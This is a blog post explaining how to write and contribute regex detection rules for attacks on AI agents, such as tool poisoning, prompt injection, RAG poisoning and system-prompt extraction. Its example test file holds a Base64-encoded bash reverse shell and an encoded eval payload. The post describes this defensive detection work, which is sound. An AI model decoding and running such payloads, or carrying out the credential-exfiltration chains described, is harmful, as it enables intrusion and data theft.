Engineering

Contributing to ATR: How Security Researchers Can Shape AI Agent Security

Panguard TeamMarch 6, 20269 min

ATR is an open RFC. Here is how to write detection rules, submit them, and help build the standard for AI agent threat detection.

ATR Is Open Because AI Security Must Be Collaborative

Agent Threat Rules (ATR) is not a proprietary detection format. It is an open RFC -- a specification published for public review, community contribution, and collective improvement. We believe that AI agent security is too critical and too fast-moving for any single company to handle alone.

The threat landscape for AI agents evolves daily. New MCP tools ship every week. Novel prompt injection techniques emerge from research labs and red teams worldwide. A closed detection system will always lag behind. An open one, maintained by the global security community, has a chance of keeping up.

This guide walks through everything you need to contribute detection rules to the ATR project.

What Makes a Good ATR Rule

Before writing your first rule, it helps to understand what separates an effective detection rule from a noisy one.

Field Coverage

A good rule targets the right field. ATR defines several inspection fields, and choosing the correct one is critical:

●tool_response: The output returned by an MCP tool. This is where tool poisoning and output injection attacks manifest.
●tool_description: The metadata and documentation of a tool. Malicious tools often hide prompt injection in their description fields.
●user_prompt: The input from the user to the agent. Direct prompt injection attacks target this field.
●model_response: The agent's generated output. Compromised agents may produce responses that attempt to exfiltrate data or manipulate the user.
●system_prompt: The system-level instructions given to the agent. Attacks that modify or override system prompts are among the most dangerous.
●agent_context: The accumulated context available to the agent, including conversation history and retrieved documents. RAG poisoning attacks target this field.

Regex Quality

ATR rules are regex-driven. Your patterns need to be precise enough to catch real attacks and broad enough to handle variations, without generating false positives on legitimate content.

Good regex practices for ATR:

●Use \s+ instead of literal spaces to handle whitespace variations
●Use character classes [\x27"] to match both single and double quotes
●Use non-greedy quantifiers *? when matching variable-length content
●Anchor patterns appropriately -- a reverse shell pattern should not match a blog post discussing reverse shells
●Test against both malicious samples and benign content that might contain similar keywords

False Positive Management

Every rule should document known false positive scenarios. A rule that detects "eval(" in tool responses will fire on every JavaScript tutorial tool. That is not useful. Instead, the pattern should be specific enough to distinguish eval(user_controlled_input) from eval appearing in documentation or example code.

Include a false_positives section in your rule metadata describing scenarios where the rule might trigger on benign content. This helps users tune their deployments and helps reviewers assess the rule's practical value.

Writing Your First ATR Rule

Here is a step-by-step walkthrough of creating a new ATR rule. We will write a rule that detects Base64-encoded payloads in tool responses -- a technique attackers use to evade simple string matching.

Step 1: Choose Your Template

Start with the ATR rule template:

id: ATR-2026-XXX
title: [Descriptive title]
description: >
  [Multi-line description of what the rule detects
  and why it matters]
severity: [critical|high|medium|low]
status: draft
category: [prompt-injection|tool-poisoning|credential-theft|privilege-escalation|data-exfiltration|code-execution|evasion|denial-of-service]
detection:
  field: [target field]
  patterns:
    - "[regex pattern 1]"
    - "[regex pattern 2]"
  condition: [any|all]
false_positives:
  - "[Description of known false positive scenario]"
metadata:
  author: [Your name or handle]
  created: [YYYY-MM-DD]
  references:
    - [URL to relevant research or advisory]

Step 2: Define the Detection Logic

For our Base64 payload detection rule, the key insight is that encoded payloads in tool responses typically follow a pattern: a block of Base64 characters that, when decoded, contains shell commands or code execution primitives.

id: ATR-2026-045
title: Base64-Encoded Payload in Tool Response
description: >
  Detects Base64-encoded strings in MCP tool responses that
  decode to common shell commands or code execution primitives.
  Attackers encode payloads to bypass plain-text pattern matching.
severity: high
status: draft
category: evasion
detection:
  field: tool_response
  patterns:
    - "[A-Za-z0-9+/]{40,}={0,2}"
  decode:
    - encoding: base64
      then_match:
        - "/bin/(ba)?sh"
        - "eval\\s*\\("
        - "exec\\s*\\("
        - "subprocess"
        - "child_process"
  condition: any
false_positives:
  - "Tools that legitimately return Base64-encoded images or binary data"
  - "API responses containing Base64-encoded authentication tokens"
metadata:
  author: Your Name
  created: 2026-03-06
  references:
    - https://panguard.ai/atr/ATR-2026-045

Notice the decode block -- this is an ATR extension that tells the detection engine to first decode matched Base64 strings, then apply secondary patterns to the decoded content. This two-stage approach catches encoded payloads without flagging legitimate Base64 data.

Step 3: Test Your Rule

Every ATR rule submission must include test cases. Create a test file with both positive (should match) and negative (should not match) samples:

# tests/ATR-2026-045.test.yaml
positive:
  - description: "Base64-encoded bash reverse shell"
    field: tool_response
    value: "Results: L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xLzQ0NDQgMD4mMQ=="
  - description: "Base64-encoded eval payload"
    field: tool_response
    value: "Data: ZXZhbChhdG9iKCdZV3hsY25Rb0lra2dhR0YyWlNCaVpXVnVJR2hoWTJ0bFpDSXAnKSk="
negative:
  - description: "Legitimate Base64 image data"
    field: tool_response
    value: "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk"
  - description: "Short Base64 string (below threshold)"
    field: tool_response
    value: "token: dGVzdA=="

Step 4: Submit Your Rule

Fork the ATR repository, add your rule to the rules/ directory and your tests to tests/, and open a pull request. The PR template asks for:

●A description of the attack the rule detects
●Real-world examples or references where this attack has been observed
●Test results showing true positive and true negative counts
●False positive assessment based on testing against benign datasets

The Review Process

Every ATR rule goes through a three-stage lifecycle:

Draft

The rule is submitted and under review. Draft rules are available in the repository but not included in the default rule set. Contributors and reviewers can test them and provide feedback.

Experimental

The rule has passed initial review and shows reliable detection with acceptable false positive rates. Experimental rules are included in the --atr-rules experimental set for users who opt in to early detection coverage.

Stable

The rule has been validated across multiple environments, has documented false positive rates below 1%, and has been tested against adversarial evasion attempts. Stable rules are included in the default rule set that ships with every Panguard Guard installation.

Promotion from draft to experimental requires at least two reviewer approvals. Promotion from experimental to stable requires documented deployment data from at least three distinct environments.

Areas Needing Coverage

Several attack categories are underserved in the current ATR rule set. These represent high-value contribution opportunities:

Behavioral Detection

Current ATR rules primarily match syntactic patterns. We need rules that detect behavioral anomalies: an agent that suddenly starts accessing files outside its normal scope, a tool that returns dramatically different response lengths, or an agent that begins making requests to new external domains. Behavioral rules require a different detection model -- potentially stateful matching across multiple interactions rather than single-event pattern matching.

RAG Poisoning

Retrieval-Augmented Generation introduces a new attack surface. Documents injected into a vector database can contain hidden instructions that activate when retrieved. ATR needs rules that inspect the agent_context field for prompt injection patterns embedded in retrieved documents. This is particularly challenging because retrieved content is expected to contain natural language that may resemble injection patterns.

Model Extraction

Adversaries may use agent interactions to systematically probe and extract a model's system prompt, fine-tuning data, or behavioral boundaries. ATR rules for model extraction would inspect sequences of user_prompt values that follow known extraction patterns: asking the model to repeat its instructions, requesting output in specific formats that reveal system prompt structure, or probing boundary conditions.

Multi-Step Attack Chains

Some attacks only become visible across multiple interactions. A single request to read a file is benign. A single request to summarize data is benign. But reading a credential file, summarizing it, and sending the summary to an external URL is an attack chain. ATR needs a correlation mechanism for rules that span multiple events.

How Rules Flow to Users

Understanding the full lifecycle helps motivate contributions. Here is how a community-contributed rule reaches production:

1. Contribution: A security researcher observes a new attack pattern and writes an ATR rule

2. Review: The rule is reviewed for detection accuracy, false positive rates, and regex quality

3. Experimental deployment: The rule is included in the experimental rule set and deployed to opt-in users

4. Telemetry: Detection events from experimental deployment provide real-world validation data

5. Stable promotion: With sufficient validation, the rule enters the default stable set

6. Threat Cloud distribution: Stable rules are distributed to all Panguard Guard installations via Threat Cloud

7. Automatic protection: Every Panguard user benefits from the new detection capability

A single contribution from one researcher can protect thousands of users within weeks. That is the leverage of an open detection standard.

Getting Started

Everything you need to contribute is in the ATR repository:

●Specification: Full ATR format documentation with field definitions and schema
●Schema: JSON Schema for rule validation -- run your rules against it before submitting
●Examples: The full initial rule set with 69 rules across all 9 categories
●Test harness: A CLI tool to run your rules against test cases and measure detection accuracy
●Contribution guide: Detailed instructions for the submission and review process

Clone the repository and start exploring:

git clone https://github.com/panguard-ai/atr-spec.git
cd atr-spec

# Validate a rule against the schema
panguard atr validate rules/my-new-rule.yaml

# Run tests
panguard atr test rules/my-new-rule.yaml tests/my-new-rule.test.yaml

AI agent security is a community problem. ATR is the community's tool to solve it. Every rule you contribute makes the ecosystem safer for everyone building with AI agents.